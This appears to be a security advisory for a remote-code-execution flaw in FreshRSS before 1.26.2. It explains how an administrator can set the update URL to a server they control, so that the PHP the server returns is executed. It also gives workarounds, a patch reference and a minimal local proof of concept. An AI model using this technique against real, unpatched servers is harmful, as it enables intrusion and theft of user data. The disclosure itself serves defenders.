Summary

In FreshRSS versions <1.26.2, an authenticated administrator user can execute arbitrary code on the FreshRSS server by modifying the update URL to one they control, and gain code execution after running an update.

Details

FreshRSS requests updates by making requests to <UPDATE_URL>/?v=<CURRENT_VERSION> and the first line of the response will indicate whether there is an update or not.
If you make a request to https://update.freshrss.org/?v=1.26.3 as of right now, you will receive NO_UPDATE 1.26.3
With https://update.freshrss.org/?v=1.26.2 you will get UPDATE 1.26.3 followed by <?php and PHP code that will be put into ./data/update.php and executed.

Patch / workarounds

Workarounds: touch ./data/update.php && chmod 000 ./data/update.php or set disable_update to true in ./data/config.php
Preferably update to version 1.26.2 or later.
Fixed as of #7477

PoC

Create a new file index.html in a new directory, put the following contents inside of it:

UPDATE 1.123.0
<?php
die('RCE');

Run a webserver: php -S 127.0.0.1:1337
Modify the update URL to http://127.0.0.1:1337 and run an update.
This will not work when FreshRSS is running inside a docker container for example, because it won't have the necessary file permissions to do so. (updates are disabled inside the Docker images anyway in the config with the option disable_update)

Impact

After successfully executing code, user data including hashed passwords can be exfiltrated, the instance can be defaced when file permissions allow. Malicious code can be inserted into the instance to steal plaintext passwords, among others.

Users that run FreshRSS inside docker or have disabled updates / blocked update.php, or using git deployment are not affected.
Generally only users that use ZIP deployment are affected.